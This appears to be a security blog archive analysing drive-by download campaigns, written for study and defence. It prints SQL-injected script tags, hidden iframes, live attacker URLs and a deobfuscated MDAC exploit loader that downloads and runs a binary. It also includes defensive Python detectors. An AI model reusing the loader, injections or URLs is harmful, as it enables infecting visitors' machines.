Archive for the 'Vulnerabilities' Category

11 Jun

Robint.us SQLi Utilizing CVE-2010-1297 Exploit

The crew behind the recent massive SQLi is currently exploiting  the latest CVE-2010-1297 vulnerability in its drive-by-download attacks.  Yesterday, I created a video demonstrating how Cloud Antivirus blocked the 0day exploit using the new behavioral blocking technology included in the free version.  Check that out here:

We recommend patching Adobe and then installing Cloud Antivirus to prevent any future 0day attacks.

Here are some logs of our most recent encounter:

Session traffic:

GET hxxp://2677.in/cnzz.html
200 OK (text/html)

GET hxxp://2677.in/ie.html
200 OK (text/html)

GET hxxp://s11.cnzz.com/stat.php?id=1990191&web_id=1990191
200 OK (text/html)

GET hxxp://2677.in/log.txt
200 OK (text/plain)

GET hxxp://2677.in/anhey.swf
200 OK (application/x-shockwave-flash)

GET hxxp://2677.in/anhey.swf
206 Partial Content (application/x-shockwave-flash)

GET hxxp://zs13.cnzz.com/stat.htm?id=1990191&r=http%3A//www.generationdb.com/&lg=en-us&ntime=0.14859300%201276289711&repeatip=0&rtime=0&cnzz_eid=82761217-1276289711-http%3A//www.generationdb.com/&showp=800x600&st=1276292642&sin=http%3A//www.generationdb.com/&res=0
200 OK (image/gif)

GET hxxp://2677.in/log.exe
200 OK (application/octet-stream)
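Added here as an example (not part of the original post): a small Python check that walks a session log in the shape shown above and flags the drive-by pattern on display, a host serving a Flash object and then an executable as application/octet-stream within the same session. The log lines are constructed from the capture above and shortened; the two-line GET/status layout is an assumption about how such a log is written.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample in the shape of the session log above (hxxp:// defanging kept).
# Assumed format: a "GET <url>" line followed by a "<status> <reason> (<mime>)" line.
SAMPLE_LOG = """\
GET hxxp://2677.in/cnzz.html
200 OK (text/html)
GET hxxp://2677.in/anhey.swf
200 OK (application/x-shockwave-flash)
GET hxxp://2677.in/anhey.swf
206 Partial Content (application/x-shockwave-flash)
GET hxxp://zs13.cnzz.com/stat.htm?id=1990191
200 OK (image/gif)
GET hxxp://2677.in/log.exe
200 OK (application/octet-stream)
"""

REQ_RE = re.compile(r"^GET\s+(\S+)$")
RESP_RE = re.compile(r"^(\d{3})\s+.*?\((\S+)\)$")

def parse_session(text):
    """Pair each GET line with the status line that follows it -> (url, status, mime)."""
    entries, pending = [], None
    for line in text.splitlines():
        line = line.strip()
        m = REQ_RE.match(line)
        if m:
            pending = m.group(1)
            continue
        m = RESP_RE.match(line)
        if m and pending:
            entries.append((pending, int(m.group(1)), m.group(2)))
            pending = None
    return entries

def host_of(url):
    # hxxp:// is defanged http://; refang only to let urlparse pull out the host name
    return urlparse(url.replace("hxxp://", "http://", 1)).hostname

def find_driveby_chains(text):
    """Flag hosts that serve a Flash object (the exploit vector in this campaign) and
    then hand the same client an executable as application/octet-stream."""
    seen_swf = defaultdict(list)
    hits = []
    for url, status, mime in parse_session(text):
        host = host_of(url)
        if mime == "application/x-shockwave-flash" and status in (200, 206):
            seen_swf[host].append(url)
        elif mime == "application/octet-stream" and host in seen_swf:
            hits.append({"host": host, "exploit": seen_swf[host][0], "payload": url})
    return hits
```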

Injection log:

<table width="96%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="2"><img alt="" src="images/5x5.gif" width="5" height="8" /></td>
</tr>
<tr>
<td align="center" class="hoverbox"><a href="#"><img src='upload/community/moresmall_37726110_lego.jpg<script src=hxxp://ww.robint.us/u.js></script><script src=hxxp://2677.in/yahoo.js></script>' alt="" /><img src='upload/community/large_37726110_lego.jpg<script src=hxxp://ww.robint.us/u.js></script><script src=hxxp://2677.in/yahoo.js></script>' alt="" class="preview" /></a></td>
<td width="55%" valign="top" class="category">
<a href="unregisteredcommunity.aspx?Com_id='7'" target="_self">We are all</a> ... <br />Category: Groups,<br />Location: USA<script src=hxxp://2677.in/yahoo.js></script></td></tr><tr><td colspan="2">-----------------------------------------</td></tr></table></td>
</tr><tr>
<td>
<table width="96%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="2"><img alt="" src="images/5x5.gif" width="5" height="8" /></td>
</tr>
<tr>
<td align="center" class="hoverbox"><a href="#"><img src='upload/community/moresmall_2065474113_IMG_4127.JPG<script src=hxxp://ww.robint.us/u.js></script><script src=hxxp://2677.in/yahoo.js></script>' alt="" /><img src='upload/community/large_2065474113_IMG_4127.JPG<script src=hxxp://ww.robint.us/u.js></script><script src=hxxp://2677.in/yahoo.js></script>' alt="" class="preview" /></a></td>
<td width="55%" valign="top" class="category">
<a href="unregisteredcommunity.aspx?Com_id='6'" target="_self">Technosoft</a> ... <br />Category: Business,<br />Location: India<script src=hxxp://2677.in/yahoo.js></script></td></tr><tr><td colspan="2" class="line">-----------------------------------------</td></tr></table></td>
</tr>
</table>
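The injected content above has one signature: a quote-less <script src=...></script> tag landing inside the value of an existing attribute (the attacker cannot use quotes inside a quoted attribute without breaking it). Added here as an example, not from the original post, this Python snippet finds such poisoned attributes in stored HTML, lists the hosts the injected tags call out to, and strips the tags for cleanup; the sample fragment is constructed from the log above.

```python
import re

# Constructed fragment modelled on the injection log above: <script> tags appended
# inside the value of an <img src='...'> attribute, plus one in plain text content.
SAMPLE_HTML = """\
<img src='upload/community/large_1.jpg<script src=hxxp://ww.robint.us/u.js></script><script src=hxxp://2677.in/yahoo.js></script>' alt="" class="preview" />
<td>Location: USA<script src=hxxp://2677.in/yahoo.js></script></td>
<img src='upload/community/clean.jpg' alt="" />
"""

# <script src=URL></script> with an unquoted URL, as seen in the injected rows.
INJECTED_SCRIPT_RE = re.compile(
    r"<script\s+src=(?P<src>[^\s'\">]+)\s*>\s*</script\s*>", re.IGNORECASE)

# A quoted attribute whose value itself contains a <script ...> tag, e.g.
# src='x.jpg<script src=...></script>'. The tempered dot keeps the match inside one value.
ATTR_WITH_SCRIPT_RE = re.compile(
    r"""(?P<attr>\w+)=(?P<q>['"])(?P<val>(?:(?!(?P=q)).)*?<script[^>]*>.*?)(?P=q)""",
    re.IGNORECASE | re.DOTALL)

def injected_script_hosts(text):
    """Distinct hosts referenced by quote-less <script src=...></script> tags (defanged or not)."""
    hosts = set()
    for m in INJECTED_SCRIPT_RE.finditer(text):
        src = re.sub(r"^h[tx]{2}ps?://", "", m.group("src"))
        hosts.add(src.split("/")[0].lower())
    return sorted(hosts)

def find_poisoned_attributes(text):
    """(attribute, value) pairs whose value carries a script tag: the SQLi landing spot."""
    return [(m.group("attr"), m.group("val")) for m in ATTR_WITH_SCRIPT_RE.finditer(text)]

def strip_injected_scripts(text):
    """Remediation helper: remove the injected tags and leave the original value intact."""
    return INJECTED_SCRIPT_RE.sub("", text)
```

Running the same scan over the database columns that feed these pages (rather than over rendered HTML) finds the rows to clean without having to crawl the site.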

10 May

Twitter hacked by “Turkish Hacker”

This morning I logged into my Twitter account and noticed something strange. My Twitter follower count moved from over 5500 followers to zero instantaneously between reloads! Apparently, a Turkish hacker was able to exploit a bug in the Twitter website which allowed the hacker to force other Twitter accounts to automatically follow him, and suddenly every Twitter account had its follower count rolled back to zero. Many Twitter users immediately tweeted about the issue and several celebrities chimed in:

Ashton Kutcher: twitter is being hacked by some turkish hacker. haha I have 0 followers.

Justin Bieber: so i woke up here in LA and Twitter has been hacked. Turns out I am no longer popular … hackers i send a warning…u have now pissed off over 2 million teenage girls. They are more dangerous than Navy Seals.

Jim Carrey: Imagine if this hacker put his/her talent 2 some worthy use. They could 1 day have more than a false sense of superiority. They’d #BOING ;^>

Alyssa Milano: Ummmmm….. Where did my followers go @Twitter?

Mark Indelicato: It says that I have 0 followers……

Stephen Collins (7th Heaven): According 2 Twitter they’ve fixed a bug/hack that re-set following/follower #s to 0. Scary. So far, my acct isn’t re-set. Holding breath.

Joe Jonas: Wait.. So this means I have to “talk” to my friends?

The bug was first discussed on a Turkish website, which I have attempted to translate with Google Translate (any of our Turkish viewers willing to submit a better translation?):

I know that I do not think this bug. twiti accept that start with a code that identifies the code as written should be. twitter is too flat or system that is quite a simple system they write, next to facebook. entered with the data sent by the same function, they showed twiti. After all, if you want to send a data in a way and this is a bug if you send a code to be written against it, by entering a twit you’ve done the easy way ha, ha hard way. When the easy way to write the entire code is perceived as most likely. I would not do so even if I was, anyway.

hide profile sent to people who question the follower They’ll accept bids for your keywords, if you request a follow no action will be taken. so simple.

note: I’m speaking without knowing, I have no programming knowledge about the particles. I like to rant, swh.

It’s still a bit unclear as to who this Turkish Hacker is, although it may be safe to assume that one of the now suspended accounts (@borakrc) in the above Turkish blog is him.  The Twitter staff has acknowledged the bug and has already taken remediation steps to fix the error.

13 Oct

Internet Exploitation Adventure

This post shows the lengths people will go to in order to install malware onto computers. We will show how visiting one website takes you on a journey to many websites that check your computer for vulnerable software and, if any is found, install malware on your computer.

First, there is a list of the domains involved in the exploit adventure. Simply visiting hxxp://defendmycreditunion.org starts this process. Hidden iframes then load websites that scan your computer for vulnerabilities and, if a site cannot exploit it, redirect you somewhere else. These websites are still active, so proceed at your own risk.

The links on this page DO NOT link to the infected websites. They are anchor links to further down the page, to make the analysis easier to view. The links just below are listed in the approximate order in which they would load while exploiting the machine.

BE ADVISED: The actual domains may still be active. Proceed at your own risk!

The picture below shows a visual map of how the pages are loaded.


05 Oct

Multiple Exploit Page (Acrobat, Outlook Express, & Quicktime)-VIDEO

Here is another example of an exploit page. This exploit searches for a vulnerability and then injects the malware onto the computer. In this case, there are multiple files in use. All the files are listed below with details. As with previous posts, we captured video of the exploit in action. The files are available in our repository under /pnuemo-malware/1005-exploit.zip.

The first page starts the search for a vulnerability to exploit and, once one is found, loads the binary from the next URL. It looks for vulnerabilities in Adobe Acrobat, Outlook Express, and QuickTime, to name a few. The exploit page has multiple pages of obfuscated code, too much to post here. You can download the code here (.txt).

BE ADVISED: These websites may still be live. Proceed at your own risk.

hxxp://195.242.161.63/z/index.php -> hxxp://195.242.161.63/z/load.php?ssv=

doc.pdf
Result: 8/36 (22.23%)
MD5: 2b477c02cef58a4d965b149311f495f2
VirusTotal

default.exe
Result: 14/36 (38.89%)
MD5: df5fbc8fb5ab1e9a69c72508250cb451
VirusTotal
ThreatExpert Analysis

Download Video (.wmv)

04 Oct

Another Adobe Acrobat Exploit (accwizm.exe)-VIDEO

Once again, we have an Adobe exploit page injecting another piece of malware. This one is different from the one posted earlier: it redirects through multiple pages, logging each visitor. I was able to capture a video of the computer being exploited simply by visiting the page. As with the previous exploit, the installed binary is almost fully undetected except for a few heuristic catches. Look below for more information about this exploit and about the binary. It can be downloaded from /pnuemo-malware/ in our repository.

BE ADVISED: All sites may be active. Proceed at your own risk.

The user will visit the following URL: hxxp://66.232.117.33/~catetc/tdsHAX/kotopoucykanety.php

This page contains a simple hidden iframe that loads multiple pages, logging each visitor.

<iframe src="http://megsrdomain.cn/tor/count.php?o=5" width=1 height=1 style="visibility: hidden"></iframe>

In the iframe we are redirected twice until we reach the exploit page.

hxxp://megsrdomain.cn/tor/count.php?o=5 -> hxxp://megsrdomain.cn/tor/count.php?o=2 -> hxxp://82.103.138.10/ls/?t=24

hxxp://82.103.138.10/ls/?t=24 is the page that exploits Adobe Acrobat and installs the malware. This page contains many, many pages of code, too much to post here. You can view or download a clean .txt of the page code for this exploit by clicking here.

accwizm.exe
Result: 8/36 (22.22%)
MD5: 2bee943c7b8e63d17a92b99087ba15a7
VirusTotal
Sunbelt Sandbox

Download Video

04 Oct

MDAC Exploit Page (iexplorer.exe)

We discovered another exploit page that injects malware onto the user's computer by way of a vulnerability in MDAC. The initial page is loaded with obfuscated code. When deobfuscated, it exploits Adobe and then opens the loader page from which the malware payload is injected. Below is an analysis of the exploit page along with the malware information. The binary has very few real detections; most are just heuristics. This file is available in the repository under /pnuemo-malware/.

BE ADVISED: Websites may still be active, proceed at your own risk.

hxxp://gavai-pegc9.ws/Gpack/index.php

<html><head><meta HTTP-EQUIV="REFRESH" content="3; URL=index.php?404"><script language=JavaScript>
str = "ru`su)(: gtobuhno!ru`su)(!z w`s!{`e!<!enbtldou/bsd`udDmdldou)&nckdbu&(: {`e/rdu@uushctud)&he&-&{`e&(: {`e/rdu@uushctud)&bm`rrhe&-&bm&*&rh&*#e;CE#*#87B4#*&47,74@2,0&*#0E1,89#*&2@,11&*#B15#*&GB3&*#8D#*&27&(: usx!z w`s!p!<!{`e/Bsd`udNckdbu)&lr&*#yl#*&m3&*#/#*&YL&*#MI#*&U&*&UQ&-&&(: w`s!r!<!{`e/Bsd`udNckdbu)#Ridm#*#m/@q#*#qm#*#hb`uh#*#no#-&&(: w`s!u!<!{`e/Bsd`udNckdbu)&`e&*&ne&*#c/#*&ru&*#sd#*&`l&-&&(: usx!z!u/uxqd!<!0:p/nqdo)&F&*#D#*&U&-&iuuq;..f`w`h,qdfb8/vr.Fq`bj.mn`e/qiq&-g`mrd(: p/rdoe)(:!u/nqdo)(: u/Vshud)p/sdrqnordCnex(: w`s!o`ld!<!&/..//..hdyqmnsds/dyd&: u/R`wdUnGhmd)o`ld-3(: u/Bmnrd)(: |!b`ubi)d(!z| usx!z!r/ridmmdydbtud)o`ld(:!|!b`ubi)d(!z|| b`ubi)d(z||";
str2 = "";
for (i = 0; i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); };
eval (str2);
</script></head></html>

deobfuscates to:

start();
function start() {
  // The classid is assembled from string fragments to defeat simple signature matching.
  var zad = document.createElement('object');
  zad.setAttribute('id','zad');
  zad.setAttribute('classid','cl'+'si'+"d:BD"+"96C5"+'56-65A3-1'+"1D0-98"+'3A-00'+"C04"+'FC2'+"9E"+'36');
  try {
    // The vulnerable control is used to hand out an HTTP client, a shell and a byte stream.
    var q = zad.CreateObject('ms'+"xm"+'l2'+"."+'XM'+"LH"+'T'+'TP','');
    var s = zad.CreateObject("Shel"+"l.Ap"+"pl"+"icati"+"on",'');
    var t = zad.CreateObject('ad'+'od'+"b."+'st'+"re"+'am','');
    try {
      t.type = 1;  // binary stream
      q.open('G'+"E"+'T','http://gavai-pegc9.ws/Gpack/load.php',false);
      q.send(); t.open();
      t.Write(q.responseBody);  // the fetched binary is written to disk ...
      var name = './/..//iexplorer.exe';
      t.SaveToFile(name,2);
      t.Close();
    } catch(e) {}
    try { s.shellexecute(name); } catch(e) {}  // ... and then run
  } catch(e){}
}
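Added here as an example (not from the exploit page or the original post): the Python below reproduces the decoding step the loader performs, XOR 1 over every character, and generalises it: it reads the XOR constant out of the fromCharCode loop when that is visible and otherwise brute-forces the single-byte key by scoring how much the output looks like JavaScript. The obfuscated excerpt is copied from the script above; the wrapper script around it is constructed.

```python
import re

# Excerpt of the XOR-encoded string from the script above (only the first statements);
# every character is the plaintext character XOR 1.
SAMPLE_OBFUSCATED = ("ru`su)(: gtobuhno!ru`su)(!z w`s!{`e!<!enbtldou/bsd`udDmdldou)"
                     "&nckdbu&(: {`e/rdu@uushctud)&he&-&{`e&(:")

# A loader in the same shape as the page's, wrapped around the excerpt (constructed).
SAMPLE_SCRIPT = ('str = "' + SAMPLE_OBFUSCATED + '";str2 = "";'
                 'for (i = 0; i < str.length; i ++) { str2 = str2 + '
                 'String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);')

# Tokens a decoded loader is expected to contain; used to rank candidate keys.
MARKERS = ("function", "var ", "document", "CreateObject", "eval", "ActiveXObject")

def xor_decode(s, key):
    """Undo String.fromCharCode(c ^ key) for a known single-byte key."""
    return "".join(chr(ord(c) ^ key) for c in s)

def extract_xor_key(script):
    """Read the constant out of '... charCodeAt(i) ^ N' when the decode loop is visible."""
    m = re.search(r"charCodeAt\s*\(\s*\w+\s*\)\s*\^\s*(\d+)", script)
    return int(m.group(1)) if m else None

def score(text):
    """Printable-character ratio plus one point per JavaScript marker found."""
    printable = sum(32 <= ord(c) < 127 or c in "\r\n\t" for c in text)
    return printable / max(len(text), 1) + sum(text.count(m) for m in MARKERS)

def recover_key(s, keys=range(1, 256)):
    """Generalisation of the page's key=1 case: try every single-byte key, keep the best."""
    return max(keys, key=lambda k: score(xor_decode(s, k)))

def deobfuscate_script(script):
    """Pull the payload out of 'str = "..."' and decode it with the declared key,
    falling back to brute force when the XOR constant is not visible."""
    m = re.search(r'\bstr\s*=\s*"([^"]*)"', script)
    if not m:
        return None
    payload = m.group(1)
    key = extract_xor_key(script)
    return xor_decode(payload, key if key is not None else recover_key(payload))
```

The statement separators in the excerpt decode to "!" because whatever byte originally sat between statements was rendered as a space when the page was published; the identifiers and string literals decode cleanly.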

hxxp://gavai-pegc9.ws/Gpack/load.php downloads the malware binary.

file.exe
Result: 9/36 (25%)
MD5: e427f1c2438259b5b4bb386aec822e30
VirusTotal
ThreatExpert Sandbox Analysis

31 Aug

Adobe Acrobat Reader PDF Exploit (gnu.pdf & us.pdf) (UPDATED)

This morning we’ve found a website that automatically loads an infected pdf file.

When the user is directed to the infected site, there is a hidden iframe that loads the pdf file. Here’s what happens…

Links still live, proceed at your own risk.

The user visits hxxp://120.50.46.90/~admin/tps/index.php and the following obfuscated code is included:

<script language="javascript">document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%39%2E%34%36%2E%32%37%2E%34%31%2F%61%66%78%76%2F%74%70%76%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));</script>

when deobfuscated…

<iframe src="http://69.46.27.41/afxv/tpv/index.php" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

We can see the hidden iframe above and the page includes the following code…

<script>
ppdf=0;
i=0;
for(;navigator.plugins[i];i++)
{
// matches "Adobe Acrobat Plug-in ..." in the plugin description and captures its version
re=/.d.{2}e.A.{2}o.....l..-.+?([0-9]+.[0-9]+)/;
if(res=re.exec(navigator.plugins[i].description))
{
ppdf=res[1];
}
// matches "Shockwave Flash x.y rz" and records the Flash version (not used below)
var re=/.h.{5}v.+?s.\s([0-9])\S([0-9]).+?([0-9]{1,5})/;
var res;
if(res=re.exec(navigator.plugins[i].description))
{
flash=res[1]+'.'+res[2]+'.'+res[3];
}
}
ppdfenable=0;
if(ppdf!=0)
{
ppdfenable=0;
ppdf=ppdf.replace(/\D/g,"");
// only Reader 7.0.x or older is served the PDF
if(ppdf[0]==7 && ppdf[1]<1)ppdfenable=1;
if(ppdf[0]<7)ppdfenable=1;
if(ppdfenable)
{
document.write('<iframe width=1 height=1 src="hxxp://69.46.27.41/afxv/tpv/gnu.pdf"></iframe>');
}
}
</script>

This leads us to the PDF in question, located at hxxp://69.46.27.41/afxv/tpv/gnu.pdf. Here is additional information regarding this file, which is also available in /pnuemo-malware/.

gnu.pdf
Result: 6/35 (17.15%)
MD5: 213d20a0523b6ea6c93d4348a509c34c
VirusTotal

Update your software!

UPDATED 9/1 12p PST

us.pdf
Result: 10/36 (27.78%)
MD5: 8175212481f069a6dd54de9cbd044039
VirusTotal
hxxp://174.133.121.165/us.pdf
hxxp://88.85.95.134/us.pdf

26 Jul

The new wave of malware being sent by email, botnet for hire?

My friend Lithium has been blogging about the recent wave of malware being distributed by email. There seem to be two distinct campaigns right now:

1- Emails that have links to compromised web sites (no attachments)

2- Emails that have a .zip/exe attachment

As I was working on some of our customers' computers (they got infected when clicking an email from UPS, even though they never shipped anything...) I realized how bad this actually is. People think they are being infected by rogue antivirus programs (Antivirus XP, Antivirus 2009, 2009 Antivirus, AAV, ... whatever they decide to promote), but the origin of the infection itself is much worse than that:

The file received in the email is actually a variant of ZTOP or Sinowal (the name changes depending on the AV vendor). These trojans have self-update, key-logging and remote-control capabilities. Once installed, they "phone home" periodically to download updated commands.

I ran one of them on one of my virtual machines. For a few seconds, nothing happened and I was even tempted to run it again. Then the trojan connected to Russia (hxxp://blatundalqik.ru/panama/odessa.bin) and downloaded new instructions. Immediately, my virtual machine began closing applications, and before it restarted on its own the desktop background changed to the popular "your computer is infected".

Once the computer restarted, I had one of the variants of XP Antivirus running and my real antivirus was just dead. Constant warnings were coming from the task bar. I have seen these warnings hundreds of times. They are annoying, but usually they are not dangerous. This time is different.

What actually happened is that the trojan had installed itself (ntos.exe, crypts.dll, the wnspoem folder and the video/audio.dll files) and, after calling home, it was ordered to install XP Antivirus. They ordered it to install XP Antivirus the same way they could have ordered it to silently monitor the user's browsing and capture any bank or credit card information. Tomorrow they may decide that they need spamming computers, or to DoS a company... all they have to do is change the configuration file. All the infected zombies will follow orders!

Once ntos.exe and crypts.dll are installed on a computer, the computer no longer belongs to the user. Using rootkit techniques, the file hides itself from the user, and only advanced rootkit detectors will be able to reveal the real problem. The trojan also runs from a temporary file in the temp folder, while crypts.dll monitors that the registry entries required to load it on restart are still present. The computer is now part of a botnet, another zombie to be used as needed.

About the XP Antivirus infection? It's annoying, and you may have to fix a few registry entries to regain full desktop functionality, but unless you go and buy their thing they are more or less harmless (at least from a technical point of view; I'm sure the user will see it as worse than having a silent trojan).

Only the people controlling the hxxp://blatundalqik.ru server will know the actual extent of the infection. Besides the pop-ups and attempts to get your credit card information, the trojan could be recording your every keystroke, logging your visits to pay your bills, even taking screenshots of your applications, while all your confidential information is conveniently backed up on a server in Russia, should it ever be needed by someone (other than you).

The flood of XP Antivirus and similar calls to the antivirus companies also has the effect of saturating their resources, as they have to dedicate more and more time to manual removal of infections to keep the customer happy, while the real malicious code lurks in the background, undetected.

 



